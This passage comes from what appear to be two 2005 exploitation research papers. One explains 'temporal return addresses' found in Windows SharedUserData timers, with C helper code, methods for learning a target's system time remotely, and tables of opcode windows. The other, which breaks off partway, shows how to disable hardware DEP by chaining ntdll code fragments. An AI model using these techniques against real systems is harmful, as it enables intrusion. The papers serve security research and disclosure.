nanosecond timer, the best byte index to start at would be byte index 4
considering all previous indexes have a duration of less than or equal to one
second. The bytes that occur at index 4 have a 7 minute and 9 second
duration, thus making them feasible for use. With the starting byte index
determined, the next step is to create permutations of all subsequent opcode
byte combinations. In simpler terms, this would mean producing all of the
possible byte value combinations that contain the raw opcodes of a given
instruction at a byte index equal to or greater than the starting byte index.
To help visualize this, figure 5.1 provides a small sample of jmp esp byte
combinations in relation to a 100 nanosecond timer.


    Byte combinations
    -----------------------
    00 00 00 00 ff e4 00 00
    00 00 00 00 ff e4 01 00
    00 00 00 00 ff e4 02 00
    ...
    00 00 00 00 ff e4 47 04
    00 00 00 00 ff e4 47 05
    00 00 00 00 ff e4 47 06
    ...
    00 00 00 00 00 ff e4 00
    00 00 00 00 00 ff e4 01
    00 00 00 00 00 ff e4 02

    Figure 5.1: 8 byte 100ns jmp esp byte combinations


Once all of the permutations have been generated, the next step is to convert
them to meaningful absolute time representations. This is accomplished by
converting all of the permutations, which represent past, future, or present
states of the temporal address, to seconds. For instance, one of the
permutations for a jmp esp instruction found within the 64-bit 100 nanosecond
timer is 0x019de4ff00000000 (116500949249294300).
Converting this to seconds is accomplished by doing:


    11650094924 = trunc(116500949249294300 / 10^7)


This tells us the number of seconds that will have passed when the stars align
to form this byte combination, but it does not convey the scale in which the
seconds are measured, such as whether they are based from an absolute date
(such as 1970 or 1601) or are simply acting as a timer. In this case, if the
scale were defined as being the number of seconds since 1601, the total number
of seconds could be adjusted to indicate the number of seconds that have
occurred since 1970 by subtracting the constant number of seconds between 1970
and 1601:


    5621324 = 11650094924 - 11644473600


This indicates that a total of 5621324 seconds will have passed since 1970
when 0xff will be found at byte index 4 and 0xe4 will be found at byte index
5. The window of opportunity will be 7 minutes and 9 seconds, after which
point the 0xff will become a 0x00, the 0xe4 will become 0xe5, and the
instruction will no longer be usable. If 5621324 is converted to a printable
date format based on the number of seconds since 1970, one can find that the
date that this particular permutation will occur at is Fri Mar 06 19:28:44 CST
1970.

While it has now been shown that it is perfectly possible to predict specific
times in the past, present, and future that a given instruction or
instructions can be found within a temporal address, such an ability is not
useful without being able to predict or determine the state of the temporal
address on a target computer at a specific moment in time. For instance,
while an exploitation chronomancer knows that a jmp esp can be found on March
6th, 1970 at about 7:30 PM, it must also be known what the target machine has
its system time set to, down to a granularity of mere seconds, or at least
minutes. While guessing is always an option, it is almost certainly going to
be less fruitful than making use of existing tools and services that are more
than willing to provide a would-be attacker with information about the current
system time on a target machine. Some of the approaches that can be taken to
gather this information will be discussed in the next section.


5.1) Determining System Time

There are a variety of techniques that can potentially be used to determine
the system time of a target machine with varying degrees of accuracy. The
techniques listed in this section are by no means all-encompassing but do
serve as a good base. Each technique will be elaborated on in the following
sub-sections.


5.1.1) DCERPC SrvSvc NetrRemoteTOD

One approach that can be taken to obtain very granular information about the
current system time of a target machine is to use the SrvSvc's NetrRemoteTOD
request. To transmit this request to a target machine a NULL session (or
authenticated session) must be established using the standard Session Setup
AndX SMB request. After that, a Tree Connect AndX to the IPC$ share should be
issued. From there, an NT Create AndX request can be issued on the srvsvc
named pipe. Once the request is handled successfully the file descriptor
returned can be used for the DCERPC bind request to the SrvSvc's UUID.
Finally, once the bind request has completed successfully, a NetrRemoteTOD
request can be transacted over the named pipe using a TransactNmPipe request.
The response to this request should contain very granular information, such as
day, hour, minute, second, timezone, as well as other fields that are needed
to determine the target machine's system time. Figure shows a sample response.

This vector is very useful because it provides easy access to the complete
state of a target machine's system time which in turn can be used to calculate
the windows of time that a temporal address can be used during exploitation.
The negative to this approach is that it requires access to the SMB ports
(either 139 or 445), which will most likely be inaccessible to an attacker.


5.1.2) ICMP Timestamps

The ICMP TIMESTAMP request (13) can be used to obtain a machine's measurement
of the number of milliseconds that have occurred since midnight UT. If an
attacker can infer or assume that a target machine's system time is set to a
specific date and timezone, it may be possible to calculate the absolute
system time down to a millisecond resolution. This would satisfy the timing
requirements and make it possible to make use of temporal addresses that have
a scale that is measured from an absolute time. According to the RFC, though,
if a system is unable to determine the number of milliseconds since UT then it
can use another value capable of representing time (though it must set a
high-order bit to indicate the non-standard value).


5.1.3) IP Timestamp Option

Like the ICMP TIMESTAMP request, IP also has a timestamp option (type 68) that
measures the number of milliseconds since midnight UT. This could also be used
to determine down to a millisecond resolution what the remote system's clock
is set to. Since the measurement is the same, the limitations are the same as
ICMP's TIMESTAMP request.


5.1.4) HTTP Server Date Header

In scenarios where a target machine is running an HTTP server, it may be
possible to extract the system time by simply sending an HTTP request and
checking to see if the response contains a date header or not. Figure shows
an example HTTP response that contains a date header.


5.1.5) IRC CTCP TIME

Perhaps one of the more lame approaches to obtaining a target machine's time
is by issuing a CTCP TIME request over IRC. This request is designed to
instruct the responder to reply with a readable date string that is relative
to the responder's system time. Unless spoofed, the response should be
equivalent to the system time on the remote machine.


6) Determining the Return Address

Once all the preliminary work of calculating all of the viable opcode windows
has been completed and a target machine's system time has been determined, the
final step is to select the next available window for a compatible opcode
group. For instance, if the next window for a jmp esp equivalent instruction
is Sun Sep 25 22:37:28 CDT 2005, then the byte index to the start of the jmp
esp equivalent must be determined based on the permutation that was generated.
In this case, the permutation that would have been generated (assuming a 100
nanosecond period since 1601) is 0x01c5c25400000000. This means that the jmp
esp equivalent is actually a push esp, ret which starts at byte index four.
If the start of the temporal address was at 0x7ffe0014, then the return
address that should be used in order to get the push esp, ret to execute would
be 0x7ffe0018. This basic approach is common to all temporal addresses of
varying capacity, period, and scale.
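
The last step above is mechanical enough to express in a few lines of code.
The sketch below (with illustrative names, not taken from the original text)
scans the little-endian byte representation of the predicted timer state for
the desired opcode bytes and adds the matching byte index to the base of the
temporal address; with the values from this chapter it produces 0x7ffe0018.

#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Find the desired opcode bytes inside the predicted state of an 8 byte
 * temporal address and form the return address from its base.  Returns
 * 0 if the opcode does not occur in this state. */
static uint32_t temporal_return_address(uint32_t base, uint64_t state,
                                        const uint8_t *opcode, size_t len)
{
    uint8_t bytes[8];
    size_t  i;

    memcpy(bytes, &state, sizeof(bytes)); /* little-endian on x86 */

    for (i = 0; i + len <= sizeof(bytes); i++) {
        if (memcmp(&bytes[i], opcode, len) == 0)
            return base + (uint32_t)i;
    }

    return 0;
}

int main(void)
{
    /* 0x54 0xc2: the push esp / retn pair used as the jmp esp
     * equivalent in the example above. */
    const uint8_t push_esp_ret[] = { 0x54, 0xc2 };

    printf("return address: 0x%08x\n",
           temporal_return_address(0x7ffe0014, 0x01c5c25400000000ULL,
                                   push_esp_ret, sizeof(push_esp_ret)));
    return 0;
}
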


7) Case Study: Windows NT SharedUserData

With all the generic background information out of the way, a real world
practical use of this technique can be illustrated through an analysis of a
region of memory that happens to be found in every process on Windows NT+.
This region of memory is referred to as SharedUserData and has a backward
compatible format for all versions of NT, though new fields have been appended
over time. At present, the data structure that represents SharedUserData is
KUSER_SHARED_DATA, which is defined as follows on Windows XP SP2:


0:000> dt _KUSER_SHARED_DATA
   +0x000 TickCountLow                : Uint4B
   +0x004 TickCountMultiplier         : Uint4B
   +0x008 InterruptTime               : _KSYSTEM_TIME
   +0x014 SystemTime                  : _KSYSTEM_TIME
   +0x020 TimeZoneBias                : _KSYSTEM_TIME
   +0x02c ImageNumberLow              : Uint2B
   +0x02e ImageNumberHigh             : Uint2B
   +0x030 NtSystemRoot                : [260] Uint2B
   +0x238 MaxStackTraceDepth          : Uint4B
   +0x23c CryptoExponent              : Uint4B
   +0x240 TimeZoneId                  : Uint4B
   +0x244 Reserved2                   : [8] Uint4B
   +0x264 NtProductType               : _NT_PRODUCT_TYPE
   +0x268 ProductTypeIsValid          : UChar
   +0x26c NtMajorVersion              : Uint4B
   +0x270 NtMinorVersion              : Uint4B
   +0x274 ProcessorFeatures           : [64] UChar
   +0x2b4 Reserved1                   : Uint4B
   +0x2b8 Reserved3                   : Uint4B
   +0x2bc TimeSlip                    : Uint4B
   +0x2c0 AlternativeArchitecture     : _ALTERNATIVE_ARCHITECTURE_TYPE
   +0x2c8 SystemExpirationDate        : _LARGE_INTEGER
   +0x2d0 SuiteMask                   : Uint4B
   +0x2d4 KdDebuggerEnabled           : UChar
   +0x2d5 NXSupportPolicy             : UChar
   +0x2d8 ActiveConsoleId             : Uint4B
   +0x2dc DismountCount               : Uint4B
   +0x2e0 ComPlusPackage              : Uint4B
   +0x2e4 LastSystemRITEventTickCount : Uint4B
   +0x2e8 NumberOfPhysicalPages       : Uint4B
   +0x2ec SafeBootMode                : UChar
   +0x2f0 TraceLogging                : Uint4B
   +0x2f8 TestRetInstruction          : Uint8B
   +0x300 SystemCall                  : Uint4B
   +0x304 SystemCallReturn            : Uint4B
   +0x308 SystemCallPad               : [3] Uint8B
   +0x320 TickCount                   : _KSYSTEM_TIME
   +0x320 TickCountQuad               : Uint8B
   +0x330 Cookie                      : Uint4B


One of the purposes of SharedUserData is to provide processes with a global
and consistent method of obtaining certain information that may be requested
frequently, thus making it more efficient than having to incur the performance
hit of a system call. Furthermore, as of Windows XP, SharedUserData acts as
an indirect system call re-director such that the most optimized system call
instructions can be used based on the current hardware's support, such as by
using sysenter over the standard int 0x2e.

As can be seen right off the bat, SharedUserData contains a few fields that
pertain to the timing of the current system. Furthermore, if one looks
closely, it can be seen that these timer fields are actually updated
constantly, as would be expected for any timer variable:


0:000> dd 0x7ffe0000 L8
7ffe0000  055d7525 0fa00000 93fd5902 00000cca
7ffe0010  00000cca a78f0b48 01c59a46 01c59a46
0:000> dd 0x7ffe0000 L8
7ffe0000  055d7558 0fa00000 9477d5d2 00000cca
7ffe0010  00000cca a808a336 01c59a46 01c59a46
0:000> dd 0x7ffe0000 L8
7ffe0000  055d7587 0fa00000 94e80a7e 00000cca
7ffe0010  00000cca a878b1bc 01c59a46 01c59a46


The three timing-related fields of most interest are TickCountLow,
InterruptTime, and SystemTime. These three fields will be explained
individually later in this chapter. Prior to that, though, it is important to
understand some of the properties of SharedUserData and why it is quite useful
when it comes to temporal addresses.
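
As an aside, the movement visible in the dd output above can also be watched
without a debugger. The sketch below (for a 32-bit process on NT+, and not
part of the original text) reads the SystemTime field directly out of
SharedUserData and converts the 100 nanosecond count since 1601 into seconds
since 1970 using the 11644473600 second constant from chapter 5.

#include <stdio.h>
#include <stdint.h>

/* Read KUSER_SHARED_DATA.SystemTime (a KSYSTEM_TIME at 0x7ffe0014) from
 * the current process and print it as seconds since 1970. */
int main(void)
{
    volatile uint32_t *st = (volatile uint32_t *)0x7ffe0014;
    uint32_t low, high;

    /* The 64-bit value is updated non-atomically; re-read until the two
     * high parts agree. */
    do {
        high = st[1];          /* High1Time */
        low  = st[0];          /* LowPart   */
    } while (high != st[2]);   /* High2Time */

    uint64_t t100ns = ((uint64_t)high << 32) | low;

    printf("seconds since 1970: %llu\n",
           (unsigned long long)(t100ns / 10000000ULL - 11644473600ULL));

    return 0;
}
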


7.1) The Properties of SharedUserData

There are a number of important properties of SharedUserData, some of
which make it useful in terms of temporal addresses and others that make it
somewhat infeasible depending on the exploit or hardware support. As far as
the properties that make it useful go, SharedUserData is located at a static
address, 0x7ffe0000, in every version of Windows NT+. Furthermore,
SharedUserData is mapped into every process. The reasons for this are that
NTDLL, and most likely other 3rd party applications, have been compiled and
built with the assumption that SharedUserData is located at a fixed address.
This is something many people are abusing these days when it comes to passing
code from kernel-mode to user-mode. On top of that, SharedUserData is required
to have a backward compatible data structure which means that the offsets of
all existing attributes will never shift, although new attributes may be, and
have been, appended to the end of the data structure. Lastly, there are a few
products for Windows that implement some form of ASLR. Unfortunately for these
products, SharedUserData cannot be feasibly randomized, or at least the author
is not aware of any approaches that wouldn't have severe performance impacts.

On the negative side of the house, and perhaps one of the most limiting
factors when it comes to making use of SharedUserData, is that it has a null
byte located at byte index one. Depending on the vulnerability, it may or may
not be possible to use an attribute within SharedUserData as a return address
due to NULL byte restrictions. As of XP SP2 and 2003 Server SP1,
SharedUserData is no longer marked as executable and will result in a DEP
violation (if enabled) assuming the hardware supports PAE. While this is not
very common yet, it is sure to become the norm over the course of time.


7.2) Locating Temporal Addresses

As seen previously in this document, using the telescope program on any
Windows application will result in the same two (or three) timers being
displayed:


C:\>telescope 2620
[*] Attaching to process 2620 (5 polling cycles)...
[*] Polling address space........

Temporal address locations:
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]


Referring to the structure definition described at the beginning of this
chapter, it is possible for one to determine which attribute each of these
addresses is referring to. Each of these three attributes will be discussed
in detail in the following sub-sections.


7.2.1) TickCountLow

The TickCountLow attribute is used, in combination with the
TickCountMultiplier, to convey the number of milliseconds that have occurred
since system boot. To calculate the number of milliseconds since system boot,
the following equation is used:


    T = shr(TickCountLow * TickCountMultiplier, 24)


This attribute is representative of a temporal address that has a counter
scale. It starts at an unknown time and increments at constant intervals. The
biggest problem with this attribute is the interval at which it increases.
It's possible that two machines in the same room with different hardware will
have different update periods for the TickCountLow attribute. This makes it
less feasible to use as a temporal address because the update period cannot be
readily predicted.
On the other hand, it may be possible to determine the
current uptime of the machine through TCP timestamps or some alternative
mechanism, but without the ability to determine the update period, the
TickCountLow attribute seems unusable.

This attribute is located at 0x7ffe0000 on all versions of Windows NT+.


7.2.2) InterruptTime

This attribute is used to store a 100 nanosecond timer starting at system boot
that presumably counts the amount of time spent processing interrupts. The
attribute itself is stored as a KSYSTEM_TIME structure which is defined as:


0:000> dt _KSYSTEM_TIME
   +0x000 LowPart   : Uint4B
   +0x004 High1Time : Int4B
   +0x008 High2Time : Int4B


Depending on the hardware a machine is running, the InterruptTime's period may
be exactly equal to 100 nanoseconds. However, testing has seemed to confirm
that this is not always the case. Given this, both the update period and the
scale of the InterruptTime attribute should be seen as limiting factors. This
fact makes it less useful because it has the same limitations as the
TickCountLow attribute. Specifically, without knowing when the system booted
and when the counter started, or how much time has been spent processing
interrupts, it is not possible to reliably predict when certain bytes will be
at certain offsets. Furthermore, the machine would need to have been booted
for a significant amount of time in order for some of the useful instructions
to be feasibly found within the bytes that compose the timer.

This attribute is located at 0x7ffe0008 on all versions of Windows NT+.


7.2.3) SystemTime

The SystemTime attribute is by far the most useful attribute when it comes to
its temporal address qualities. The attribute itself is a 100 nanosecond
timer that is measured from Jan. 1, 1601 and is stored as a KSYSTEM_TIME
structure like the InterruptTime attribute. See the InterruptTime sub-section
for a structure definition. This means that it has an update period of 100
nanoseconds and has a scale that measures from Jan. 1, 1601. The scale is also
measured relative to the timezone that the machine is using (with the
exclusion of daylight savings time). If an attacker is able to obtain
information about the system time on a target machine, it may be possible to
make use of the SystemTime attribute as a valid temporal address for
exploitation purposes.

This attribute is located at 0x7ffe0014 on all versions of Windows NT+.


7.3) Calculating Viable Opcode Windows

After analyzing SharedUserData for temporal addresses it should become clear
that the SystemTime attribute is by far the most useful and potentially
feasible attribute due to its scale and update period. In order to
successfully leverage it in conjunction with an exploit, though, the viable
opcode windows must be calculated so that a time to strike can be selected.
This can be done prior to determining what the actual date is on a target
machine but requires that the storage capacity (size of the temporal address
in bytes), the update period, and the scale be known. In this case, the size
of the SystemTime attribute is 12 bytes, though in reality the third field,
High2Time, is exactly the same as the second, High1Time, so all that really
matters are the first 8 bytes. Doing the math to calculate per-byte durations
gives the results shown in figure 4.1.
This indicates that it is only
worth focusing on opcode permutations that start at byte index four due to the
fact that all previous byte indexes have a duration of less than or equal to
one second. By applying the scale as being measured since Jan 1, 1601, all of
the possible permutations for the past, present, and future can be calculated
as described in chapter 5. The results of these calculations for the
SystemTime attribute are described in the following paragraphs.

In order to calculate the viable opcode windows it is necessary to have
identified the viable set of opcodes. In this case study a total of 320
viable opcodes were used (recall that opcode in this case can mean one or more
instruction). These viable opcodes were taken from the Metasploit Opcode
Database. After performing the necessary calculations and generating all of
the permutations, a total of 3615 viable opcode windows were found between
Jan. 1, 1970 and Dec. 23, 2037. Each viable opcode was broken down into
groupings of similar or equivalent opcodes such that it could be made easier
to visualize.

Looking closely at these figures it can be seen that there were two large
spikes around 2002 and 2003 for the [esp + 8] => eip opcode group which
includes pop/pop/ret instructions common to SEH overwrites. Looking more
closely at these two years shows that there were two significant periods of
time during 2002 and 2003 where the stars aligned and certain exploits could
have used the SystemTime attribute as a temporal return address. Figure shows
the spikes in more detail. It's a shame that this technique was not published
about during those time frames! Never again in the lifetime of anyone who
reads this paper will there be such an occurrence.

Perhaps of more interest than past occurrences of certain opcode groups is
what will come in the future. The table in figure 7.1 shows the upcoming
viable opcode windows for 2005.


    Date                          Opcode Group
    ------------------------------------------
    Sun Sep 25 22:08:50 CDT 2005  eax => eip
    Sun Sep 25 22:15:59 CDT 2005  ecx => eip
    Sun Sep 25 22:23:09 CDT 2005  edx => eip
    Sun Sep 25 22:30:18 CDT 2005  ebx => eip
    Sun Sep 25 22:37:28 CDT 2005  esp => eip
    Sun Sep 25 22:44:37 CDT 2005  ebp => eip
    Sun Sep 25 22:51:47 CDT 2005  esi => eip
    Sun Sep 25 22:58:56 CDT 2005  edi => eip
    Tue Sep 27 04:41:21 CDT 2005  eax => eip
    Tue Sep 27 04:48:30 CDT 2005  ecx => eip
    Tue Sep 27 04:55:40 CDT 2005  edx => eip
    Tue Sep 27 05:02:49 CDT 2005  ebx => eip
    Tue Sep 27 05:09:59 CDT 2005  esp => eip
    Tue Sep 27 05:17:08 CDT 2005  ebp => eip
    Tue Sep 27 05:24:18 CDT 2005  esi => eip
    Tue Sep 27 05:31:27 CDT 2005  edi => eip
    Tue Sep 27 06:43:02 CDT 2005  [esp + 0x20] => eip
    Fri Oct 14 14:36:48 CDT 2005  eax => eip
    Sat Oct 15 21:09:19 CDT 2005  ecx => eip
    Mon Oct 17 03:41:50 CDT 2005  edx => eip
    Tue Oct 18 10:14:22 CDT 2005  ebx => eip
    Wed Oct 19 16:46:53 CDT 2005  esp => eip
    Thu Oct 20 23:19:24 CDT 2005  ebp => eip
    Sat Oct 22 05:51:55 CDT 2005  esi => eip
    Sun Oct 23 12:24:26 CDT 2005  edi => eip
    Thu Nov 03 23:17:07 CST 2005  eax => eip
    Sat Nov 05 05:49:38 CST 2005  ecx => eip
    Sun Nov 06 12:22:09 CST 2005  edx => eip
    Mon Nov 07 18:54:40 CST 2005  ebx => eip
    Wed Nov 09 01:27:11 CST 2005  esp => eip
    Thu Nov 10 07:59:42 CST 2005  ebp => eip
    Fri Nov 11 14:32:14 CST 2005  esi => eip
    Sat Nov 12 21:04:45 CST 2005  edi => eip

    Figure 7.1: Opcode windows for Sept 2005 - Jan 2006


8) Case study: Example application

Aside from Windows' processes having SharedUserData present, it may also be
possible, depending on the application in question, to find other temporal
addresses at static locations across various operating system versions. Take
for instance the following example program that simply calls time() every
second and stores the result in a local variable on the stack named t:


#include <time.h>
#include <windows.h>

void main() {
    unsigned long t;

    while (1) {
        t = time(NULL);
        SleepEx(1000, TRUE);
    }
}


When the telescope program is run against a running instance of this example
program, the results produced are:


C:\>telescope 3004
[*] Attaching to process 3004 (5 polling cycles)...
[*] Polling address space........

Temporal address locations:
0x0012FE24 [Size=4, Scale=Counter, Period=70 msec]
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
0x0012FE9C [Size=4, Scale=Counter, Period=1 sec]
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]


Judging from the source code of the example application it would seem clear
that the address 0x0012ff7c coincides with the local variable t which is used
to store the number of seconds since 1970. Indeed, the t variable also has an
update period of one second as indicated by the telescope program. The other
findings may be either inaccurate or not useful depending on the particular
situation, but the fact that they were identified as counters instead of being
relative to one of the two epoch times most likely makes them unusable.

In order to write an exploit that can leverage the temporal address t, it is
first necessary to take the steps outlined in this document with regard to
calculating the duration of each byte index and then building a list of all
the viable opcode permutations.
The durations of each byte index for a four
byte timer with a one second period are shown in figure 8.1.


    Byte Index   Seconds (ext)
    ------------------------
    0            1 (1 sec)
    1            256 (4 mins 16 secs)
    2            65536 (18 hours 12 mins 16 secs)
    3            16777216 (194 days 4 hours 20 mins 16 secs)

    Figure 8.1: 4 byte 1sec per-byte durations in seconds


The starting byte index for this temporal address is byte index one due to the
fact that it has the smallest feasible window of time for an exploit to be
launched (4 mins 16 secs). After identifying this starting byte index,
permutations for all the viable opcodes can be generated.

Nearly all of the viable opcode windows have a window of 4 minutes. Only a
few have a window of 18 hours. To get a better idea for what the future has
in store for a timer like this one, figure 8.2 shows the upcoming viable
opcode windows for 2005.


    Date                          Opcode Group
    ------------------------------------------
    Fri Sep 02 01:28:00 CDT 2005  [reg] => eip
    Thu Sep 08 21:18:24 CDT 2005  [reg] => eip
    Fri Sep 09 15:30:40 CDT 2005  [reg] => eip
    Sat Sep 10 09:42:56 CDT 2005  [reg] => eip
    Sun Sep 11 03:55:12 CDT 2005  [reg] => eip
    Tue Sep 13 10:32:00 CDT 2005  [reg] => eip
    Wed Sep 14 04:44:16 CDT 2005  [reg] => eip

    Figure 8.2: Opcode windows for Sept 2005 - Jan 2006


9) Conclusion

Temporal addresses are locations in memory that are tied to a timer of some
sort, such as a variable storing the number of seconds since 1970. Like a
clock, temporal addresses have an update period, meaning the rate at which
their contents change. They also have an inherent storage capacity which
limits the amount of time they can convey before being rolled back over to the
start. Finally, temporal addresses will also always have a scale associated
with them that indicates the unit of measure for the contents of a temporal
address, such as whether it's simply being used as a counter or whether it's
measuring the number of seconds since 1970. These three attributes together
can be used to predict when certain byte combinations will occur within a
temporal address.

This type of prediction is useful because it can allow an exploitation
chronomancer the ability to wait until the time is right and then strike once
predicted byte combinations occur in memory on a target machine. In
particular, the byte combinations most useful would be ones that represent
useful opcodes, or instructions, that could be used to gain control over
execution flow and allow an attacker to exploit a vulnerability. Such an
ability can give the added benefit of providing an attacker with universal
return addresses in situations where a temporal address is found at a static
location in memory across multiple operating system and application revisions.

An exploitation chronomancer is one who is capable of divining the best time
to exploit something based on the alignment of certain bytes that occur
naturally in a process' address space. By making use of the techniques
described in this document, or perhaps ones that have yet to be described or
disclosed, those who have yet to dabble in the field of chronomancy can begin
to get their feet wet. Viable opcode windows will come and go, but the
usefulness of temporal addresses will remain for eternity, or at least as long
as computers as they are known today are around.

The fact of the matter is, though, that while the subject matter discussed in
this document may have an inherent value, the likelihood of it being used for
actual exploitation is slim to none due to the variance and delay between
viable opcode windows for different periods and scales of temporal addresses.
Or is it really that unlikely? Vlad902 suggested a scenario where an attacker
could compromise an NTP server and configure it to constantly return a time
that contains a useful opcode for exploitation purposes. All of the machines
that synchronize with the compromised NTP server would then eventually have a
predictable system time. While not completely foolproof, considering it's not
always known how often NTP clients will synchronize (although logs could be
used), it's nonetheless an interesting approach. Regardless of feasibility,
the slave that is knowledge demands to be free, and so it shall.


Bibliography

Mesander, Rollo, and Zeuge. The Client-To-Client Protocol (CTCP).
http://www.irchelp.org/irchelp/rfc/ctcpspec.html; accessed Aug 5, 2005.

Metasploit Project. The Metasploit Opcode Database.
http://metasploit.com/users/opcode/msfopcode.cgi; accessed Aug 6, 2005.

Postel, J. RFC 792 - Internet Control Message Protocol.
http://www.ietf.org/rfc/rfc0792.txt?number=792; accessed Aug 5, 2005.


Bypassing Windows Hardware-enforced Data Execution Prevention
Oct 2, 2005

skape (mmiller@hick.org)
Skywing (Skywing@valhallalegends.com)

One of the big changes that Microsoft introduced in Windows XP Service Pack 2
and Windows 2003 Server Service Pack 1 was support for a new feature called
Data Execution Prevention (DEP). This feature was added with the intention of
doing exactly what its name implies: preventing the execution of code in
non-executable memory regions. This is particularly important when it comes to
preventing the exploitation of most software vulnerabilities because most
exploits tend to rely on storing arbitrary code in what end up being
non-executable memory regions, such as a thread stack or a process heap. There
are other documented techniques for bypassing non-executable protections, such
as returning into ZwProtectVirtualMemory or doing a chained ret2libc style
attack, but these approaches tend to be more complicated and in many cases are
more restricted due to the need to use bytes (such as NULL bytes) that would
otherwise be unusable in common situations[1].

DEP itself is capable of functioning in two modes. The first mode is referred
to as Software-enforced DEP. It provides fairly limited support for preventing
the execution of code through exploits that take advantage of Structured
Exception Handler (SEH) overwrites. Software-enforced DEP is used on
machines that are not capable of supporting true non-executable pages due to
inadequate hardware support. Software-enforced DEP is also a compile-time only
change, and as such is typically limited to system libraries and select
third-party applications that have been recompiled to take advantage of it.
Bypassing this mode of DEP has been discussed before and is not the focus of
this document.

The second mode in which DEP can operate is referred to as Hardware-enforced
DEP. This mode is a superset of software-enforced DEP and is used on hardware
that supports marking pages as non-executable.
While most existing Intel-based
hardware does not have this feature (due to legacy support for only marking
pages as readable or writable), newer chipsets are beginning to have true
hardware support through things like Physical Address Extension (PAE).
Hardware-enforced DEP is the most interesting of the two modes since it can be
seen as a truly mitigating factor to most common exploitation vectors. The
bypass technique described in this document is designed to be used against
this mode.

Before describing the technique, it is prudent to understand the parameters
under which it will operate. In this case, the technique is meant to provide a
way of executing code from regions of memory that would not typically be
executable when hardware-enforced DEP is in use, such as a thread stack or a
process heap. This technique can be seen as a means of eliminating DEP from the
equation when it comes to writing exploits because the commonly used approach of
executing custom code from a writable memory address can still be used.
Furthermore, this technique is meant to be as generic as possible such that it
can be used in both existing and new exploits without major modifications. With
the parameters set, the next requirement is to understand some of the new
features that compose hardware-enforced DEP.

When implementing support for DEP, Microsoft rightly realized that many existing
third-party applications might run into major compatibility issues due to
assumptions about whether or not a region of allocated memory is executable. In
order to handle this situation, Microsoft designed DEP so that it could be
configured in a few different manners. At the most general level, DEP is
designed to have a default parameter that indicates whether or not
non-executable protection is enabled only for system processes and custom
defined applications (OptIn), or whether it's enabled for everything except for
applications that are specifically exempted (OptOut). These two flags are
passed to the kernel during boot through the /NoExecute option in boot.ini.
Furthermore, two other flags can be passed as part of the NoExecute option to
indicate that DEP should be AlwaysOn or AlwaysOff. These two settings force a
flag to be set for each process that permanently enables or disables DEP. The
default setting on Windows XP SP2 is OptIn, while the default setting on Windows
2003 Server SP1 is OptOut.

Aside from the global system parameter, DEP can also be enabled or disabled on a
per-process basis. The disabling of non-executable (NX) support for a process
is determined at execution time. To support this, a new internal routine was
added to ntdll.dll called LdrpCheckNXCompatibility. This routine checks a few
different things to determine whether or not NX support should be enabled for
the process. The routine itself is called whenever a DLL is loaded in the
context of a process through LdrpRunInitializationRoutines. The first check it
performs is to see if a SafeDisc DLL is being loaded. If it is, NX support is
flagged as needing to be disabled for the process. The second check it performs
is to look in the application database for the process to see if NX support
should be disabled or enabled. Lastly, it checks to see if the DLL that is
being loaded is flagged as having an NX incompatible section (such as .aspack,
.pcle, and .sforce).

As a result of these checks, NX support is either enabled or disabled through a
new PROCESSINFOCLASS named ProcessExecuteFlags (0x22).
When a call to
NtSetInformationProcess is issued with this information class, a four byte
bitmask is supplied as the buffer parameter. This bitmask is passed to
nt!MmSetExecuteOptions which performs the appropriate operation. Optionally, a
flag (MEM_EXECUTE_OPTION_PERMANENT, or 0x8) can also be specified as part of the
bitmask that indicates that future calls to the function should fail such that
the execute flags cannot be changed again. To enable NX support, the
MEM_EXECUTE_OPTION_DISABLE flag (0x1) is specified. To disable NX support, the
MEM_EXECUTE_OPTION_ENABLE flag (0x2) is specified. Depending on the state of
these per-process flags, execution of code from non-executable memory regions
will either be permitted (MEM_EXECUTE_OPTION_ENABLE) or denied
(MEM_EXECUTE_OPTION_DISABLE).

If it were in some way possible for an attacker to change the execution flags of
a process that is being exploited, then it follows that the attacker would be
able to execute code from previously non-executable memory regions. In order to
do this, though, the attacker would have to run code from regions of memory that
are already executable. As chance would have it, there happen to be useful
executable memory regions, and they exist at the same address in every process
[2].

To take advantage of this feature, an attacker must somehow cause
NtSetInformationProcess to be called with the ProcessExecuteFlags information
class. Furthermore, the ProcessInformation parameter must be set to a bitmask
that has the MEM_EXECUTE_OPTION_ENABLE bit set, but not the
MEM_EXECUTE_OPTION_DISABLE bit set. The following code illustrates a call to
this function that would disable NX support for the calling process:


ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE;

NtSetInformationProcess(
    NtCurrentProcess(),      // (HANDLE)-1
    ProcessExecuteFlags,     // 0x22
    &ExecuteFlags,           // ptr to 0x2
    sizeof(ExecuteFlags));   // 0x4


One method of accomplishing this would be to use a ret2libc derived attack
whereby control flow is transferred into the NtSetInformationProcess function
with an attacker-controlled frame set up on the stack. In this case, the
arguments described to the right in the above code snippet would have to be set
up on the stack so that they would be interpreted correctly when
NtSetInformationProcess begins executing. The biggest drawback to this approach
is that it would require NULL bytes to be usable as part of the buffer that is
used for the overflow. Generally speaking, this will not be possible,
especially with any overflow that is caused through the use of a string
function. However, when possible, this approach can certainly be useful.

Though a direct return into NtSetInformationProcess may not be universally
feasible, another technique can be used that lends itself to being more
generally applicable. Under this approach, the attacker can take advantage of
code that already exists within ntdll for disabling NX support for a process.
By returning into a specific chunk of code, it is possible to disable NX support
just as ntdll would while still being able to transfer control back into a
user-controlled buffer. The one limitation, however, is that the attacker must
be able to control the stack in a way similar to most ret2libc style attacks,
but without the need to control arguments.

The first step in this process is to cause control to be transferred to a
location in memory that performs an operation that is equivalent to a mov al,
0x1 / ret combination.
Many instances of similar instructions exist (xor eax,
eax / inc eax / ret; mov eax, 1 / ret; etc). One such instance can be found in
the ntdll!NtdllOkayToLockRoutine function.


ntdll!NtdllOkayToLockRoutine:
7c952080 b001             mov     al,0x1
7c952082 c20400           ret     0x4


This will cause the low byte of eax to be set to one for reasons that will
become apparent in the next step. Once control is transferred to the mov
instruction, and then subsequently the ret instruction, the attacker must have
set up the stack in such a way that the ret instruction actually returns into
another segment of code inside ntdll. Specifically, it should return part of
the way into the ntdll!LdrpCheckNXCompatibility routine.


ntdll!LdrpCheckNXCompatibility+0x13:
